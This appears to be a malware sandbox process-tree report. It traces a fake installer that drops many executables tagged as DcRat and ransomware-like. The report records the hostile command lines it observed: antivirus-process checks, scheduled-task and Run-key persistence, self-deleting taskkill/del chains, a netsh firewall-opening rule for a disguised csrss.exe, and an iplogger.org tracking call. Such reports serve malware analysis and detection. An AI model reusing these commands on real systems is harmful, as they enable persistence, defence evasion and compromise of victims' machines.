-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3028 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3564 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4900 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4264 /prefetch:82⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_rkfree_setup_301_password_123.zip\rkfree_setup_301_password_123.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_rkfree_setup_301_password_123.zip\rkfree_setup_301_password_123.exe"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\rkfree_setup\rkfree_setup64.exe"C:\Users\Admin\AppData\Local\Temp\rkfree_setup\rkfree_setup64.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Drops file in System32 directory
- NTFS ADS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rvlkl.exe"C:\Windows\system32\rvlkl.exe" -install -lang 93⤵
- Executes dropped EXE
-
C:\Windows\system32\rvlkl.exe"C:\Windows\system32\rvlkl.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_File.zip\Install.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\Q_al8h5yJr2pfKnyjDa7K4bP.exe"C:\Users\Admin\Pictures\Minor Policy\Q_al8h5yJr2pfKnyjDa7K4bP.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Users\Admin\Downloads\File\Install.exe"C:\Users\Admin\Downloads\File\Install.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\9ttTG63SaCJEubu9iGdOslGV.exe"C:\Users\Admin\Pictures\Minor Policy\9ttTG63SaCJEubu9iGdOslGV.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\robocopy.exerobocopy 89273873764872637456726738462763749829384862735682793849823849728343⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Interests.vss & ping -n 5 localhost3⤵
-
C:\Windows\SysWOW64\cmd.execmd4⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AvastUI.exe"5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avastui.exe"5⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq AVGUI.exe"5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "avgui.exe"5⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^fLEXoLsnFh$" Spa.vss5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rehab.exe.pifRehab.exe.pif F5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\PING.EXEping -n 5 localhost4⤵
- Runs ping.exe
-
C:\Users\Admin\Pictures\Minor Policy\0ESIFYudXNYZaYrWCRa9HdY_.exe"C:\Users\Admin\Pictures\Minor Policy\0ESIFYudXNYZaYrWCRa9HdY_.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\8yRrDWZmXks9IvL_IS0nj_06.exe"C:\Users\Admin\Pictures\Minor Policy\8yRrDWZmXks9IvL_IS0nj_06.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" SnQV6I.A -s3⤵
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Minor Policy\X70ItBxukSvymp13PgQhBSOh.exe"C:\Users\Admin\Pictures\Minor Policy\X70ItBxukSvymp13PgQhBSOh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1944 -s 4283⤵
- Program crash
-
C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"3⤵
- DcRat
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ece638ff-5062-40ce-bed5-d6d234b910ab" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe"C:\Users\Admin\Pictures\Minor Policy\OtV01fNRpBSqIMPnvBIz_5U1.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Modifies extensions of user files
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build2.exe"C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build2.exe"C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build2.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build2.exe" & del C:\PrograData\*.dll & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build3.exe"C:\Users\Admin\AppData\Local\e6948d1b-41d4-4c56-96c1-ce2a0d9a933e\build3.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\Hees5gyHhxQ9S2TKRxCAvjcm.exe"C:\Users\Admin\Pictures\Minor Policy\Hees5gyHhxQ9S2TKRxCAvjcm.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Minor Policy\Hees5gyHhxQ9S2TKRxCAvjcm.exe"C:\Users\Admin\Pictures\Minor Policy\Hees5gyHhxQ9S2TKRxCAvjcm.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\49AAFB727CL5GDI.exe"C:\Users\Admin\AppData\Local\Temp\49AAFB727CL5GDI.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\49AAFB727CL5GDI.exe"C:\Users\Admin\AppData\Local\Temp\49AAFB727CL5GDI.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\0M20GBJKA66FG9A.exe"C:\Users\Admin\AppData\Local\Temp\0M20GBJKA66FG9A.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\0M20GBJKA66FG9A.exe"C:\Users\Admin\AppData\Local\Temp\0M20GBJKA66FG9A.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\KBHKAC88D1F3HM2.exe"C:\Users\Admin\AppData\Local\Temp\KBHKAC88D1F3HM2.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\KBHKAC88D1F3HM2.exe"C:\Users\Admin\AppData\Local\Temp\KBHKAC88D1F3HM2.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C start C:\Windows\Temp\xsv.exe6⤵
-
C:\Windows\Temp\xsv.exeC:\Windows\Temp\xsv.exe7⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\MID2G1BELCG7H55.exe"C:\Users\Admin\AppData\Local\Temp\MID2G1BELCG7H55.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" SnQV6I.A -s5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\KD005C2835911EG.exehttps://iplogger.org/1x5az74⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\qkftJGDPHrj6GpoYfaz9kGzw.exe"C:\Users\Admin\Pictures\Minor Policy\qkftJGDPHrj6GpoYfaz9kGzw.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"3⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\cNqK1rl2lwvcIXjaMDuEDhDV.exe"C:\Users\Admin\Pictures\Minor Policy\cNqK1rl2lwvcIXjaMDuEDhDV.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\jR5Q7PgDKXRyFifhSjYEWAo0.exe"C:\Users\Admin\Pictures\Minor Policy\jR5Q7PgDKXRyFifhSjYEWAo0.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-2BJT4.tmp\jR5Q7PgDKXRyFifhSjYEWAo0.tmp"C:\Users\Admin\AppData\Local\Temp\is-2BJT4.tmp\jR5Q7PgDKXRyFifhSjYEWAo0.tmp" /SL5="$2026C,3267745,979456,C:\Users\Admin\Pictures\Minor Policy\jR5Q7PgDKXRyFifhSjYEWAo0.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\java.exe"C:\Users\Admin\AppData\Roaming\java.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"5⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"6⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Yandex\YaAddon\23ad3aa1\filezilla.exe"C:\Users\Admin\AppData\Local\Yandex\YaAddon\23ad3aa1\filezilla.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"8⤵
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\system32\svchost.exe"9⤵
- Loads dropped DLL
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
-
C:\Users\Admin\Pictures\Minor Policy\1GPK0P7aXVq71TQv22DqyPmM.exe"C:\Users\Admin\Pictures\Minor Policy\1GPK0P7aXVq71TQv22DqyPmM.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "dllhusts.exe" /f & erase "C:\ProgramData\All rights (c)2020-2021 Jonathan Bennett & AutoIt\Autov5\AutoIt v5 Setup\dllhusts.exe" & exit5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "dllhusts.exe" /f6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\rd1hX32qxbTEj_w1iCuwV_j3.exe"C:\Users\Admin\Pictures\Minor Policy\rd1hX32qxbTEj_w1iCuwV_j3.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\iZr04NHQo2wt4BXC1sIRm5E6.exe"C:\Users\Admin\Pictures\Minor Policy\iZr04NHQo2wt4BXC1sIRm5E6.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\vqaxOmEozavyS1F_VZNHcPSf.exe"C:\Users\Admin\Pictures\Minor Policy\vqaxOmEozavyS1F_VZNHcPSf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\tW7Y0_b8aGCZGB9K4Cnu3Izl.exe"C:\Users\Admin\Pictures\Minor Policy\tW7Y0_b8aGCZGB9K4Cnu3Izl.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Minor Policy\Mmwt5y3s3zj3YZRq2H7QWLkZ.exe"C:\Users\Admin\Pictures\Minor Policy\Mmwt5y3s3zj3YZRq2H7QWLkZ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Minor Policy\VFAG5UfCz7e3IdvdI8v01u_M.exe"C:\Users\Admin\Pictures\Minor Policy\VFAG5UfCz7e3IdvdI8v01u_M.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\nIS_6lAPkuiAD1vGQNmAscKo.exe"C:\Users\Admin\Pictures\Minor Policy\nIS_6lAPkuiAD1vGQNmAscKo.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Updater.exe"C:\Users\Admin\AppData\Local\Temp\Updater.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\epJtHFnMJr1xk7GmIRKBf6e5.exe"C:\Users\Admin\Pictures\Minor Policy\epJtHFnMJr1xk7GmIRKBf6e5.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\epJtHFnMJr1xk7GmIRKBf6e5.exe"C:\Users\Admin\Pictures\Minor Policy\epJtHFnMJr1xk7GmIRKBf6e5.exe" -h3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\SpCSbJF2gtnaYf15VB7gkWOO.exe"C:\Users\Admin\Pictures\Minor Policy\SpCSbJF2gtnaYf15VB7gkWOO.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\File\Install.exe"C:\Users\Admin\Downloads\File\Install.exe"1⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\mRs1315_U1bIiV5F6j7EgWjc.exe"C:\Users\Admin\Pictures\Minor Policy\mRs1315_U1bIiV5F6j7EgWjc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\File\Install.exe"C:\Users\Admin\Downloads\File\Install.exe"1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\he1ZfC3bR4eCfnDzT1OlvgXI.exe"C:\Users\Admin\Pictures\Minor Policy\he1ZfC3bR4eCfnDzT1OlvgXI.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Downloads\File\Install.exe"C:\Users\Admin\Downloads\File\Install.exe"1⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Minor Policy\uEu3BlPDRxDD3lXheMCJwF3k.exe"C:\Users\Admin\Pictures\Minor Policy\uEu3BlPDRxDD3lXheMCJwF3k.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 1944 -ip 19441⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6496 -ip 64961⤵
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\E01D.exeC:\Users\Admin\AppData\Local\Temp\E01D.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\DA6.dll1⤵
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\DA6.dll2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\80E3.exeC:\Users\Admin\AppData\Local\Temp\80E3.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11976 -s 3402⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\8B35.exeC:\Users\Admin\AppData\Local\Temp\8B35.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 11996 -s 4242⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 428 -p 11996 -ip 119961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 11976 -ip 119761⤵
-
C:\Users\Admin\AppData\Local\Temp\9BFF.exeC:\Users\Admin\AppData\Local\Temp\9BFF.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\9BFF.exe"C:\Users\Admin\AppData\Local\Temp\9BFF.exe" -h2⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12372 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 12372 -ip 123721⤵
-
C:\Users\Admin\AppData\Local\Temp\AA09.exeC:\Users\Admin\AppData\Local\Temp\AA09.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\AA09.exe"C:\Users\Admin\AppData\Local\Temp\AA09.exe" -h2⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 6003⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1248 -ip 12481⤵
-
C:\Users\Admin\AppData\Local\Temp\CDFD.exeC:\Users\Admin\AppData\Local\Temp\CDFD.exe1⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\F3F5.exeC:\Users\Admin\AppData\Local\Temp\F3F5.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 13244 -s 4762⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 552 -p 13244 -ip 132441⤵
-
C:\Users\Admin\AppData\Local\Temp\E35.exeC:\Users\Admin\AppData\Local\Temp\E35.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\E35.exe"C:\Users\Admin\AppData\Local\Temp\E35.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
-
